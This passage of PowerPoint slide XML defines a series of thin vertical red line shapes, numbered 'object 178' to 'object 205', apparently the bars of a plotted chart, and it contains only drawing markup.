          <a:ln w="8606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="178" name="object 178"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3805951" y="5353072"/>
            <a:ext cx="0" cy="634208"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="320039">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="319869"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5603">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="179" name="object 179"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3805951" y="5350097"/>
            <a:ext cx="0" cy="640499"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="323214">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="322872"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="180" name="object 180"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3825783" y="4786627"/>
            <a:ext cx="0" cy="1200465"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="605789">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="605714"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5603">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181" name="object 181"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3825783" y="4783654"/>
            <a:ext cx="0" cy="1206756"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="608964">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="608716"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182" name="object 182"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3846016" y="5236447"/>
            <a:ext cx="0" cy="751234"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="379094">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="378722"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="183" name="object 183"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3846016" y="5233472"/>
            <a:ext cx="0" cy="757526"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="382269">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="381725"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184" name="object 184"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3865848" y="5136491"/>
            <a:ext cx="0" cy="850642"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="429260">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="429163"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="185" name="object 185"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3865848" y="5133516"/>
            <a:ext cx="0" cy="856933"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="432435">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="432165"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="186" name="object 186"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3885683" y="5375282"/>
            <a:ext cx="0" cy="612816"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="309244">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="308663"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="187" name="object 187"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3885683" y="5372306"/>
            <a:ext cx="0" cy="617849"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="311785">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="311665"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="188" name="object 188"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3905515" y="4969892"/>
            <a:ext cx="0" cy="1018004"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="513714">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="513234"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189" name="object 189"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3905515" y="4966917"/>
            <a:ext cx="0" cy="1023037"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="516255">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="516237"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190" name="object 190"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3925348" y="5469691"/>
            <a:ext cx="0" cy="518440"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="261619">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="261020"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191" name="object 191"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3925348" y="5466716"/>
            <a:ext cx="0" cy="523473"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="264160">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="264023"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="192" name="object 192"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3945182" y="5008761"/>
            <a:ext cx="0" cy="978995"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="494030">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="493619"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193" name="object 193"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3945182" y="5005787"/>
            <a:ext cx="0" cy="985287"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="497205">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="496621"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="194" name="object 194"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3965014" y="5414157"/>
            <a:ext cx="0" cy="573807"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="289560">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="289044"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="195" name="object 195"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3965014" y="5411183"/>
            <a:ext cx="0" cy="578840"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="292100">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="292047"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="196" name="object 196"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3984849" y="5175363"/>
            <a:ext cx="0" cy="811635"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="409575">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="409548"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="197" name="object 197"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3984849" y="5172385"/>
            <a:ext cx="0" cy="817927"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="412750">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="412550"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="198" name="object 198"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4004681" y="5475244"/>
            <a:ext cx="0" cy="512148"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="258444">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="258219"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="199" name="object 199"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4004681" y="5472267"/>
            <a:ext cx="0" cy="518440"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="261619">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="261221"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="200" name="object 200"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4024515" y="5164257"/>
            <a:ext cx="0" cy="822960"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="415289">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="415151"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="201" name="object 201"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4024515" y="5161283"/>
            <a:ext cx="0" cy="829252"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="418464">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="418154"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="202" name="object 202"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4044348" y="5386390"/>
            <a:ext cx="0" cy="601491"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="303530">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="303056"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="203" name="object 203"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4044348" y="5383416"/>
            <a:ext cx="0" cy="606524"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="306069">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="306058"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="204" name="object 204"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4064578" y="5297539"/>
            <a:ext cx="0" cy="689575"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="347980">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="347893"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5603">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="205" name="object 205"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4064578" y="5294565"/>
            <a:ext cx="0" cy="695867"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
